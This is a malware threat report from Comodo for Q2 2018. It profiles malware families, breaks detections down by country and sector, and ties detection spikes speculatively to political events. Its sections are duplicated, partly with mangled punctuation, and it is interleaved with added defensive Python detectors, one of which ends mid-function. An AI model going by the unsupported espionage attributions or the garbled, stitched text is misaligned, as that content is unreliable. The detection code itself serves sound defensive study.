521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. These agencies then immediately began to fulfill those requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa – precisely where the summit was scheduled to take place.
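The timelines in 7.1 through 7.10 are read by eye: a day counts as a spike when it sits far above the surrounding days (7.4 puts one at "well over ten times the usual"). As an added example that is not part of the report, the Python below turns that reading into a reproducible rule over a constructed 30-day series of daily detection counts: the baseline is the median of the previous seven days, and a day is flagged when it reaches a chosen multiple of that baseline. The data, the window and the factor are assumptions for illustration; the report does not show how Comodo's own counts were produced.

```python
"""Flag anomalous spikes in a daily malware-detection time series.

Added example (not from the Comodo report): the report's geopolitical
section reads spikes off timelines by eye; this reproduces that reading
as a rule. The counts below are constructed, not real telemetry.
"""
from datetime import date, timedelta
from statistics import median

# Constructed sample: 30 days of roughly flat daily detection counts for one
# country, with a single day far above the baseline (hypothetical data).
START = date(2018, 5, 1)
SAMPLE_COUNTS = [41, 38, 45, 40, 39, 44, 42, 37, 43, 40,
                 46, 41, 39, 520, 44, 42, 40, 38, 45, 41,
                 43, 39, 42, 40, 44, 41, 38, 43, 40, 42]
SAMPLE_SERIES = [(START + timedelta(days=i), c) for i, c in enumerate(SAMPLE_COUNTS)]


def find_spikes(series, window=7, factor=10.0, min_baseline=1):
    """Return [(day, count, ratio)] for days whose count is at least `factor`
    times the median of the preceding `window` days.

    A trailing median is used instead of a mean so that one earlier spike
    does not inflate the baseline and hide a later one. Days without a full
    window of history are skipped; `min_baseline` keeps near-zero baselines
    (quiet countries) from turning tiny counts into huge ratios."""
    spikes = []
    for i in range(window, len(series)):
        history = [c for _, c in series[i - window:i]]
        baseline = max(median(history), min_baseline)
        day, count = series[i]
        ratio = count / baseline
        if ratio >= factor:
            spikes.append((day, count, round(ratio, 1)))
    return spikes


def spike_report(series, **kwargs):
    """Human-readable summary, one line per flagged day."""
    return [f"{d.isoformat()}: {c} detections, {r}x the trailing median"
            for d, c, r in find_spikes(series, **kwargs)]


if __name__ == "__main__":
    for line in spike_report(SAMPLE_SERIES):
        print(line)
```

The median baseline matters where two spikes sit close together, as on the Iraq timeline in 7.7: a mean would be dragged up by the first and could hide the second. The factor and window are per-country tuning knobs, since low-volume countries such as North Korea in 7.4 produce large ratios from small absolute counts.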
8 Conclusions
In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will soon be amplified. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence, and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
About Comodo Cybersecurity
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or DarkComet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
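The Starter behaviour described above, a new account created and then placed in the administrators group, leaves a pair of Windows Security log events that a defender can correlate. The Python below is an added example, not Comodo's or Microsoft's code: it parses constructed, pipe-separated log lines in a format invented here (a real SIEM export needs its own parser) and flags accounts that were created (event ID 4720) and added to an administrative group (event ID 4732 or 4728) within a short window. The event IDs are the real Windows values; the account names, hosts and timestamps are made up.

```python
"""Correlate Windows Security log events that betray a trojan creating its
own administrator account.

Added example, not code from the Comodo report or from Microsoft. The log
excerpt is constructed in a pipe-separated format invented here; the event
IDs are the real Windows Security log values.
"""
from datetime import datetime

ACCOUNT_CREATED = 4720     # A user account was created
LOCAL_GROUP_ADD = 4732     # A member was added to a security-enabled local group
GLOBAL_GROUP_ADD = 4728    # A member was added to a security-enabled global group
ADMIN_GROUPS = {"Administrators", "Domain Admins"}

# Constructed export: time|event_id|subject (who acted)|target account|group
SAMPLE_LOG = """\
2018-06-03T02:14:07|4720|WORKSTATION$|svc_remote|
2018-06-03T02:14:09|4732|WORKSTATION$|svc_remote|Administrators
2018-06-03T09:30:00|4720|jdoe_admin|intern01|
2018-06-03T09:31:12|4732|jdoe_admin|intern01|Remote Desktop Users
2018-06-04T11:00:00|4732|jdoe_admin|backup_op|Administrators
"""


def parse_events(text):
    """Turn the export into dicts; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, subject, target, group = line.split("|")
        events.append({"time": datetime.fromisoformat(ts), "id": int(eid),
                       "subject": subject, "target": target, "group": group})
    return events


def new_admin_accounts(events, window_seconds=600):
    """Return (account, created_at, elevated_at, subject) for every account
    that was created and then added to an admin group within the window.

    Both halves are required: an existing account being made admin
    (backup_op) or a new account joining a non-admin group (intern01) is
    routine administration and is not reported."""
    created, hits = {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] == ACCOUNT_CREATED:
            created[ev["target"]] = ev
        elif ev["id"] in (LOCAL_GROUP_ADD, GLOBAL_GROUP_ADD) and ev["group"] in ADMIN_GROUPS:
            origin = created.get(ev["target"])
            if origin and (ev["time"] - origin["time"]).total_seconds() <= window_seconds:
                hits.append((ev["target"], origin["time"], ev["time"], ev["subject"]))
    return hits


def describe(hits):
    """One alert line per hit. A subject ending in '$' is a computer account,
    meaning the change was made by a process running as the machine/SYSTEM
    rather than by a logged-on administrator, which strengthens the alert."""
    lines = []
    for account, created_at, elevated_at, subject in hits:
        delta = int((elevated_at - created_at).total_seconds())
        who = f"{subject} (computer account, non-interactive)" if subject.endswith("$") else subject
        lines.append(f"{account}: created then made admin {delta}s later by {who}")
    return lines


if __name__ == "__main__":
    for line in describe(new_admin_accounts(parse_events(SAMPLE_LOG))):
        print(line)
```

Only the svc_remote account is reported: it was created and elevated two seconds apart by the computer account itself, which is how a service-level implant looks in the log, whereas the two human-driven changes fall outside the pattern.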
5.2.4 Exploits
Computer exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
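Exploit documents in PDF form usually depend on the format's own hooks: an action that fires when the file is opened (/OpenAction or /AA) and content that executes or embeds something (/JavaScript, /JS, /Launch, /EmbeddedFile and similar). The Python triage below is an added example, not part of the report; it counts those name objects after undoing the #xx name escaping that PDF permits and that evasive files use to hide them, then grades the file. Both sample files are constructed and harmless (the second only raises a viewer alert). Keyword triage of this kind flags the delivery wrapper, not the underlying parser bug, so a clean score does not prove a file safe.

```python
"""Triage a PDF for the features exploit documents usually depend on.

Added example, not part of the Comodo report. It counts the PDF name
objects that commonly carry or auto-trigger malicious content (the same
idea as keyword scanners such as pdfid), after undoing the #xx name escaping
that PDF permits. Both sample files are constructed and harmless.
"""
import re

# Names that run or embed content (payload carriers) and names that fire
# automatically when the document is opened (triggers).
PAYLOAD_NAMES = ("/JavaScript", "/JS", "/Launch", "/EmbeddedFile", "/RichMedia", "/XFA")
TRIGGER_NAMES = ("/OpenAction", "/AA")
# A name ends at whitespace, a PDF delimiter or end of data, so that /JS does
# not match inside a longer name such as /JSX.
_NAME_END = rb"(?=[\s()<>\[\]{}/%]|$)"

# Constructed one-page document with nothing active in it.
BENIGN_PDF = (b"%PDF-1.4\n"
              b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
              b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
              b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj\n"
              b"trailer << /Root 1 0 R >>\n%%EOF\n")

# Constructed document that runs script on open; the script name is written
# with a #61 escape (hex for 'a') to show why names must be normalized.
SUSPICIOUS_PDF = (b"%PDF-1.4\n"
                  b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
                  b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
                  b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj\n"
                  b"4 0 obj << /S /J#61vaScript /JS (app.alert(1)) >> endobj\n"
                  b"trailer << /Root 1 0 R >>\n%%EOF\n")


def normalize_names(data: bytes) -> bytes:
    """Decode #xx escapes so that /J#61vaScript is seen as /JavaScript.
    Applied to the whole file, which is acceptable for triage: stream bytes
    may be altered, but only name objects are counted afterwards."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def count_names(data: bytes) -> dict:
    """Occurrences of each risky name, omitting names that do not appear."""
    norm = normalize_names(data)
    counts = {}
    for name in PAYLOAD_NAMES + TRIGGER_NAMES:
        n = len(re.findall(re.escape(name.encode()) + _NAME_END, norm))
        if n:
            counts[name] = n
    return counts


def triage(data: bytes):
    """Return (verdict, counts): 'high' = auto-trigger plus payload carrier,
    'review' = either alone, 'low' = none, 'malformed' = no %PDF- header."""
    if not data.lstrip().startswith(b"%PDF-"):
        return "malformed", {}
    counts = count_names(data)
    has_trigger = any(n in counts for n in TRIGGER_NAMES)
    has_payload = any(n in counts for n in PAYLOAD_NAMES)
    if has_trigger and has_payload:
        return "high", counts
    if has_trigger or has_payload:
        return "review", counts
    return "low", counts


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_PDF), ("suspicious", SUSPICIOUS_PDF)):
        print(label, triage(doc))
```

The combination is what drives the grade: an /OpenAction alone is common in legitimate forms, and /JavaScript alone is common in interactive documents, but a script wired to fire on open is the shape most PDF exploit droppers take, so that pairing is scored highest.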
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
"Packed" malware refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages UCL, an open source data compression algorithm that is just a few hundred bytes of code in length.
In Q2 2018, Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
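As an added example not drawn from the report or from the UPX project, the Python below shows two ways a packed executable gives itself away to a defender: a stock UPX build leaves sections literally named UPX0/UPX1, while a modified build that renames them still carries compressed code whose byte entropy sits near 8 bits per byte. The PE images it parses are constructed in memory (valid DOS, COFF and section headers, no executable code) purely so the checks have something to read; the 7.0 entropy threshold is an assumption that needs tuning against a real corpus, since legitimately compressed resources and embedded certificates also score high.

```python
"""Spot packed PE executables by section name and by section entropy.

Added example, not part of the Comodo report and not UPX project code.
The PE images below are constructed in-memory stubs (valid headers, no
code), built only so that the checks have a section table to parse.
"""
import math
import random
import struct
from collections import Counter

OPT_HDR_SIZE = 0xE0                       # PE32 optional header size
UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly random."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes):
    """Return [(name, raw_size, entropy)] read from the PE section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]      # NumberOfSections
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]         # SizeOfOptionalHeader
    table = coff + 20 + opt_size
    out = []
    for i in range(num_sections):
        off = table + 40 * i
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, off + 8)
        out.append((name, raw_size, shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])))
    return out


def assess(pe: bytes, threshold: float = 7.0):
    """'upx' when stock UPX section names are present; 'likely-packed' when no
    known names appear but a non-empty section has entropy >= threshold (how a
    renamed or modified packer still shows up); otherwise 'unpacked'."""
    sections = parse_sections(pe)
    hot = [name for name, size, ent in sections if size and ent >= threshold]
    if {name for name, _, _ in sections} & UPX_SECTION_NAMES:
        return "upx", hot
    return ("likely-packed" if hot else "unpacked"), hot


def build_pe(sections):
    """Construct a minimal PE image from [(name, raw_bytes)] for testing.
    VirtualAddress is a placeholder; only the raw-data fields are parsed."""
    hdr_end = 0x40 + 4 + 20 + OPT_HDR_SIZE + 40 * len(sections)
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)    # e_lfanew = 0x40
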